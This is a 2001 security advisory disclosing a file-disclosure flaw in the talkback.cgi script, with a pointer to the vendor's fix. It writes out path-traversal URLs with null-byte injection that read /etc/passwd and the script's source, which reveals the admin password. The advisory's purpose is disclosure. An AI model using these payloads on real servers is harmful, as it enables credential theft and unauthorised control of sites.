[whizkunde security advisory: talkback (CGI)] http://www.whizkunde.org | stan@whizkunde.org ---------------------------------------------------------- Release date: April 9th 2001 Subject: talkback.cgi security problem Systems affected: UNIX systems running talkback CGI script Vendor: http://www.waytotheweb.com ---------------------------------------------------------- 1. problem Talkback.cgi may allow remote users (website visitors) to view any file on a webserver (depending on the user the webserver is running on). Regard this URL: http://www.VULNERABLE-HOST.com/cgi-bin/talkback.cgi?article= ../../../../../../../../etc/passwd%00&action=view&matchview=1 This will display the /etc/passwd (if the webserver user has access to this file). Another URL can display the source of talkback.cgi itself that contains the admin password: http://www.VULNERABLE-HOST.com/cgi-bin/talkback.cgi?article= ../cgi-bin/talkback.cgi%00&action=view&matchview=1 (You might have to use another URL instead of ../cgi-bin/talkback.cgi%00, this depends on where the cgi-bin is installed) In this file you can find $admin_password that can be used in: http://www.VULNERABLE-HOST.com/cgi-bin/talkback.cgi?action=admin to post & delete articles. 2. fix Way To The Web has released an updated version of talkback.cgi that isn't vulnerable to this problem: http://www.waytotheweb.com/webscripts/talkback.htm ---------------------------------------------------------- Stan a.k.a. ThePike stan@whizkunde.org http://www.whizkunde.org Copyright whizkunde security team 2001